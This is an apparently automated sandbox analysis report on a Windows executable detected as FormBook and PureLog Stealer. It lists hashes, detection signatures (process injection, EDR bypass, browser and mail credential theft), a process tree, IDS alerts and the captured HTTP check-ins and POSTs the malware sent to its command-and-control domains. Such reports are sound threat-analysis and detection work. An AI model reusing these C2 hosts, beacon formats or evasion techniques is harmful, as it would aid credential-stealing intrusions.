Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562914
MD5: 09e5c83fa32b0bb661143784179329a0
SHA1: 0fa6b1217891055124b62ed520f63d7d2b28536e
SHA256: 1258f319f29525155f61593b7533e03ab0db3bc3fb823842a752044e80790a3c
Tags: exe, user-abuse_ch

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 09E5C83FA32B0BB661143784179329A0)
    • file.exe (PID: 500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 09E5C83FA32B0BB661143784179329A0)
      • YpbicUfTwt.exe (PID: 5348 cmdline: "C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • find.exe (PID: 3568 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • YpbicUfTwt.exe (PID: 6504 cmdline: "C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.file.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.file.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.file.exe.7200000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.file.exe.7200000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.file.exe.3e39970.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched
Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T09:26:58.603302+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49761 | 185.26.237.170 | 80 | TCP
2024-11-26T09:27:36.156305+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49712 | 15.197.142.173 | 80 | TCP
2024-11-26T09:28:01.113609+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49717 | 172.67.213.249 | 80 | TCP
2024-11-26T09:28:15.930091+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49721 | 13.248.169.48 | 80 | TCP
2024-11-26T09:28:31.005926+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49725 | 173.0.157.187 | 80 | TCP
2024-11-26T09:28:47.196730+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49729 | 13.227.8.45 | 80 | TCP
2024-11-26T09:29:10.336980+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49733 | 13.248.169.48 | 80 | TCP
2024-11-26T09:29:26.297337+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49737 | 38.47.233.4 | 80 | TCP
2024-11-26T09:29:41.221072+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49741 | 199.192.23.123 | 80 | TCP
2024-11-26T09:29:56.496958+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49745 | 104.21.36.239 | 80 | TCP
2024-11-26T09:30:13.423589+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49749 | 208.91.197.27 | 80 | TCP
2024-11-26T09:30:28.972131+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49753 | 199.59.243.227 | 80 | TCP
2024-11-26T09:30:44.357789+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49757 | 13.248.169.48 | 80 | TCP

                      AV Detection

Source: file.exe ReversingLabs: Detection: 34%
Source: Yara match File source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: find.pdb source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpbicUfTwt.exe, 00000004.00000002.3854637326.000000000029E000.00000002.00000001.01000000.0000000C.sdmp, YpbicUfTwt.exe, 00000007.00000000.1639437568.000000000029E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: find.pdbGCTL source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_006DC7D0 FindFirstFileW,FindNextFileW,FindClose, 5_2_006DC7D0
Source: C:\Windows\SysWOW64\find.exe Code function: 4x nop then xor eax, eax 5_2_006C9E70
Source: C:\Windows\SysWOW64\find.exe Code function: 4x nop then mov ebx, 00000004h 5_2_00DC04D8

                      Networking

Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 208.91.197.27:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 172.67.213.249:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 38.47.233.4:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 15.197.142.173:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 199.192.23.123:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 13.227.8.45:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 104.21.36.239:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 173.0.157.187:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49761 -> 185.26.237.170:80
Source: Joe Sandbox View IP Address: 13.248.169.48
Source: Joe Sandbox View IP Address: 15.197.142.173
Source: Joe Sandbox View ASN Name: COGENT-174US
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
    GET /zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.dojodigitize.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.masterqq.pro
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q== HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.hasan.cloud
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.0be.info
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg== HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.tageting.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.ssps.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.qqc5.top
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.learnnow.info
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.goldbracelet.top
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ== HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.regislemberthe.online
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /c8xp/?ynlT=l2hePdG2jE2F6AlCjwqyhHlkxUQzRJGliE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCi0s4BCVbW+K50/dKIaUUEtFLragHdQcQoqOBThjHGNr3A==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.honk.city
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /t3a1/?ynlT=lPY12PoV4Qu/vhxaDGrG8k6ABtrDoTA3UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE3V94n9AcHyNncbJEzMiuzMO81JxmNo9FVK575fLvIMTSQ==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.gupiao.bet
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic HTTP traffic detected:
    GET /plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xt HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.fengzheng.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Source: global traffic DNS traffic detected: DNS query: www.dojodigitize.shop
Source: global traffic DNS traffic detected: DNS query: www.masterqq.pro
Source: global traffic DNS traffic detected: DNS query: www.hasan.cloud
Source: global traffic DNS traffic detected: DNS query: www.0be.info
Source: global traffic DNS traffic detected: DNS query: www.tageting.shop
Source: global traffic DNS traffic detected: DNS query: www.ulojenukw.shop
Source: global traffic DNS traffic detected: DNS query: www.ssps.shop
Source: global traffic DNS traffic detected: DNS query: www.qqc5.top
Source: global traffic DNS traffic detected: DNS query: www.learnnow.info
Source: global traffic DNS traffic detected: DNS query: www.goldbracelet.top
Source: global traffic DNS traffic detected: DNS query: www.regislemberthe.online
Source: global traffic DNS traffic detected: DNS query: www.honk.city
Source: global traffic DNS traffic detected: DNS query: www.gupiao.bet
Source: global traffic DNS traffic detected: DNS query: www.fengzheng.shop
Source: unknown HTTP traffic detected:
    POST /vfw3/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.masterqq.pro
    Cache-Control: no-cache
    Content-Length: 205
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.masterqq.pro
    Referer: http://www.masterqq.pro/vfw3/
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
    Data Ascii: ynlT=moIYvYq7EEvVURa8F3ZfZJKLTVI07rAiWNU3QSCaovL4jSGNx4aRf8H+dDunaT/dgbV4ap4ug/1Sl/N+QtyXStdz2n8tz21CZ+fwkPQ+tHQcGuDBAk9VJ9FOJf9bjLkJAOAzeHs5FFh9WBvBxU56sVwvMJOe0QKwxHdfBPXuODemNKtx0Lz7n5UnNnQcPATZkCjbDf0=
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: awselb/2.0
    Date: Tue, 26 Nov 2024 08:27:35 GMT
    Content-Length: 0
    Connection: close
    WAFRule: 5
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:27:52 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCsFWfjLv620tjP4iq5iNp3c0bVeyRYZ1WG4e8g40Wuqx4cGzLe6T5Yr%2FeE3nMuv9GYUMaEPMkz4dAsfDOY5cyjmhbnnS4ekaI3eDYby4okFz6Wz6kXimls1F6WMGdWtuOqb"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e88807658804400-EWR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=707&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:27:55 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COCxnX7ChKNOHP0FlugX7V0dAfhywGscetcl639ZtlEfw%2Fh5cHyhR4B%2BQMQJHhc6Ro%2B2QUC5vS9EsNQeCMlhSyLpc03v%2FKmGYuCNqYXlzFncb78HC2L7wYxGUMgju66RpI%2BP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e888086d8b4c342-EWR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1529&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:27:58 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5PoCDpbAx09MgJD%2BL2c7SJK0NBesSqUVSgXPmheNdbhqluvlzo5haagfX6kZFBfwwC8P3%2FGcNlpyojxWIk4wL0bCJ83YQ1e%2FI44V6jMJE3H8y8DfFPM%2BZXqYxHdvJKkkfBy"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e8880985eee4249-EWR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2209&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1744&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:28:00 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOBr9xxZ3xCfGlU%2BXwNn6vNmEkGHbIk3Qdtung1g%2BuzAIT74AdTg%2FgJp14rCnGFI9tljKUS2vopOo5tEV0hlz9IFgBSyovgxNmS7AJbSZR1ye1f8MrT1FoLmpR2JJreTh%2F%2F4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e8880a8ff2542da-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 26 Nov 2024 08:29:17 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 26 Nov 2024 08:29:20 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!--
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
